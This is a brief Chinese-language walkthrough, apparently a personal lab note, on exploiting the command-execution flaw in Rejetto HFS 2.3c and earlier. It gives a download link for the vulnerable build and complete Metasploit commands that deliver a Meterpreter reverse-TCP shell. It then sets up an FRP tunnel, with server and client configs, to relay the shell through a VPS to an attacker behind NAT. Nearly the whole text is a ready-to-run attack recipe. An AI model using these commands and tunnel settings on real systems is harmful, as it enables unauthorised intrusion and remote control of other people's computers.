hfs在比较早的版本存在命令执行漏洞,2.3c及以前的2.3x版本 下载链接
http://d3.meisq.net:806/1206/hfshttp.zip打开之后设置默认运行 这里 kaliip192.168.164.129 HFSip192.168.164.128
kali配置
msfconsole search hfs use exploit/windows/http/rejetto_hfs_exec show options set rhosts 192.168.164.128 set rport 949 set payload windows/meterpreter/reverse_tcp set lhost 192.168.164.129 show options其他配置不用修改,可以根据环境和实际情况进行修改
run首先把hfs桥接到局域网,之后kali在内网, hfsip192.168.1.120 kaliip192.168.164.129 vpsip192.168.1.110’ 这里在局域网模拟公网环境
msfconsole use exploit/windows/http/rejetto_hfs_exec show options set rhosts 192.168.1.120 set rport 949 set payload windows/meterpreter/reverse_tcp set lhost 192.168.1.110 show options在192.168.164.110启动frps
frps -c frps.inifrps.ini配置
[common] bind_port = 7000 token = 12345678在kali启动frpc
/root/frp30/frpc -c /root/frp30/frpc.inifrpc.ini配置
[common] server_addr = 192.168.1.110 server_port = 7000 token = 12345678 [msf] type = tcp local_ip = 127.0.0.1 local_port = 4444 remote_port = 4444 [http] type = tcp local_ip = 127.0.0.1 local_port = 8080 remote_port = 8080msf启动
run这是实际遇到的环境,当时遇到了好多问题,所以总结一下。